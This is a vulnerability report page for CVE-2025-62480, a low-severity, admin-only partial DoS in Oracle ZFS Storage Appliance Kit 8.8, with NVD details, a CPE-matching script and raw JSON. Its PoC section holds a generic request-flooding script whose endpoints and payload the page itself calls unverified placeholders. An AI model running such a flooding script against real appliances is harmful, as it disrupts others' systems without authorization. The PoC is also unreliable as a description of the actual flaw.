Security Vulnerability Report
CVE-2025-62480 CVSS 2.7 LOW

Published: 2025-10-21 20:20:55
Last Modified: 2025-10-23 16:01:48

Description

Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Naming Subsystem). The supported version that is affected is 8.8. Easily exploitable vulnerability allows a high-privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DoS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).

Read the vector before the score: PR:H means the attacker must already hold high privileges on the appliance and reach it over HTTP, scope is unchanged, and there is no confidentiality or integrity impact, so the realistic exposure is an administrator (or a stolen administrative session) degrading availability of the naming subsystem, not an unauthenticated remote attack. The only public source is the Oracle Critical Patch Update of October 2025 referenced below, which carries the fix but publishes no technical details of the flaw.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L
Exploitability Sub-score
1.2
Impact Sub-score
1.4
Weakness
CWE-267 (Privilege Defined With Unsafe Actions), assigned by the secondary (ADP) source in the NVD record

Configurations (Affected Products)

cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:* - VULNERABLE
Oracle ZFS Storage Appliance Kit 8.8
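
The CPE criteria above is the machine-readable form of the affected-version statement. As an added example (not NVD's own matching code), the following Python parses CPE 2.3 formatted strings and decides whether an inventory entry for an appliance falls under this record's vulnerable criteria. The vulnerable criteria string is taken from the configuration node on this page; the inventory strings used for illustration are constructed.

```python
"""CPE 2.3 matching against the affected-configuration entry on this page.

Added example (not NVD tooling): handles the 13-field CPE 2.3 layout, the
ANY ('*') logical value, the NA ('-') value (matched literally) and colons
escaped as '\\:' inside a field value.
"""

CPE_FIELDS = (
    "part", "vendor", "product", "version", "update", "edition", "language",
    "sw_edition", "target_sw", "target_hw", "other",
)

# Vulnerable criteria from this report's configuration node.
VULNERABLE_CPES = [
    "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*",
]


def parse_cpe23(cpe: str) -> dict:
    """Split a 'cpe:2.3:...' string into its 11 named attributes."""
    fields, current, i = [], [], 0
    while i < len(cpe):
        ch = cpe[i]
        if ch == "\\" and i + 1 < len(cpe):   # keep the escaped char literally
            current.append(cpe[i + 1])
            i += 2
            continue
        if ch == ":":
            fields.append("".join(current))
            current = []
        else:
            current.append(ch)
        i += 1
    fields.append("".join(current))
    if len(fields) != 13 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe!r}")
    return dict(zip(CPE_FIELDS, fields[2:]))


def is_valid_cpe23(cpe: str) -> bool:
    try:
        parse_cpe23(cpe)
        return True
    except ValueError:
        return False


def attribute_matches(criteria: str, target: str) -> bool:
    """One attribute: '*' in the criteria covers anything; otherwise the
    values must be equal, case-insensitively. A '*' in the target does not
    satisfy a specific criteria value (an unknown version is not 8.8)."""
    if criteria == "*":
        return True
    return criteria.lower() == target.lower()


def cpe_matches(criteria: str, target: str) -> bool:
    """True if every attribute of the target is covered by the criteria."""
    c, t = parse_cpe23(criteria), parse_cpe23(target)
    return all(attribute_matches(c[f], t[f]) for f in CPE_FIELDS)


def is_affected(inventory_cpe: str, criteria=VULNERABLE_CPES) -> bool:
    """Does an inventory CPE fall under any vulnerable criteria of this record?"""
    return any(cpe_matches(c, inventory_cpe) for c in criteria)


if __name__ == "__main__":
    # Constructed inventory entries, not real appliance data.
    for entry in (
        "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*",
        "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.7:*:*:*:*:*:*:*",
    ):
        print(entry, "->", "AFFECTED" if is_affected(entry) else "not matched")
```

The matcher only compares normalised CPE strings; mapping an appliance's reported software release to the CPE version field is the inventory tool's job, and a non-match for another version says nothing about that version's status beyond its absence from this record.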

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The Oracle advisory that is this record's only reference publishes no technical details of the flaw; the login endpoint, the naming endpoint and the request body in the script are unverified placeholders and have not been confirmed against the product.
python
# CVE-2025-62480 - Oracle ZFS Storage Appliance Kit Naming Subsystem DoS PoC
# This PoC demonstrates a partial denial of service attack against the
# Naming Subsystem of Oracle ZFS Storage Appliance Kit version 8.8
# Note: Requires high privileged credentials (PR:H)
#
# Caveat: the Oracle advisory referenced by this record publishes no
# technical details. The login endpoint, the naming endpoint and the request
# body below are placeholders, not values taken from Oracle documentation or
# confirmed against the appliance; adjust them for the target before relying
# on the result.

import sys
import time
from concurrent.futures import ThreadPoolExecutor

import requests
import urllib3

# Certificate verification is disabled (verify=False) for every request
# below; silence the InsecureRequestWarning that requests emits for that.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Target configuration
TARGET_HOST = "https://<target-zfs-appliance>:215"
ADMIN_ENDPOINT = "/api/naming/v1/resolve"   # placeholder, see caveat above
USERNAME = "admin"
PASSWORD = "<high_privileged_password>"


def authenticate(session, host, username, password):
    """Authenticate to the Oracle ZFS Storage Appliance Kit."""
    auth_url = f"{host}/api/auth/v1/login"   # placeholder, see caveat above
    auth_data = {"username": username, "password": password, "type": "basic"}
    try:
        response = session.post(auth_url, json=auth_data, verify=False, timeout=10)
    except requests.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False
    if response.status_code == 200:
        print(f"[+] Successfully authenticated as {username}")
        return True
    print(f"[-] Authentication failed: {response.status_code}")
    return False


def trigger_naming_dos(session, host, payload):
    """Send a malicious naming resolution request to trigger DoS."""
    url = f"{host}{ADMIN_ENDPOINT}"
    headers = {
        "Content-Type": "application/json",
        # Session token as set by the login step above (cookie name assumed).
        "X-Auth-Session": session.cookies.get("authsession", ""),
    }
    try:
        return session.post(url, json=payload, headers=headers,
                            verify=False, timeout=30)
    except requests.exceptions.Timeout:
        print("[!] Request timed out - possible DoS condition")
        return None
    except requests.RequestException as e:
        print(f"[!] Error: {e}")
        return None


def generate_malicious_payload():
    """Generate a payload targeting the naming subsystem."""
    # Crafted payload designed to exhaust naming subsystem resources:
    # oversized name and filter strings, a deep namespace path and
    # unbounded recursion/iteration limits.
    return {
        "name": "A" * 4096,
        "namespace": "/" * 512,
        "recursive": True,
        "depth": 99999,
        "filter": "*" * 2048,
        "options": {
            "resolve_symlinks": True,
            "follow_redirects": True,
            "max_iterations": 2147483647,
        },
    }


def main():
    print("=" * 60)
    print("CVE-2025-62480 PoC - Oracle ZFS Storage Appliance Kit")
    print("Naming Subsystem Partial DoS")
    print("=" * 60)

    session = requests.Session()

    # Step 1: Authenticate with high privileged credentials
    if not authenticate(session, TARGET_HOST, USERNAME, PASSWORD):
        sys.exit(1)

    # Step 2: Generate malicious payload
    payload = generate_malicious_payload()
    print("[+] Generated payload targeting naming subsystem")

    # Step 3: Send 100 requests from 20 worker threads to trigger partial DoS
    print("[*] Sending requests to trigger partial DoS condition...")
    with ThreadPoolExecutor(max_workers=20) as executor:
        futures = []
        for _ in range(100):
            futures.append(
                executor.submit(trigger_naming_dos, session, TARGET_HOST, payload)
            )
            time.sleep(0.1)

        # Wait for all requests to complete or time out
        for i, future in enumerate(futures):
            result = future.result()
            if result is None:
                print(f"[!] Request {i} caused timeout - DoS condition triggered")
            elif result.status_code >= 500:
                print(f"[!] Request {i} returned server error: {result.status_code}")

    print("[+] PoC execution completed")


if __name__ == "__main__":
    main()

References

https://www.oracle.com/security-alerts/cpuoct2025.html - Vendor Advisory (Oracle Critical Patch Update, October 2025)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62480", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:54.723", "lastModified": "2025-10-23T16:01:48.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Naming Subsystem). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-267"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}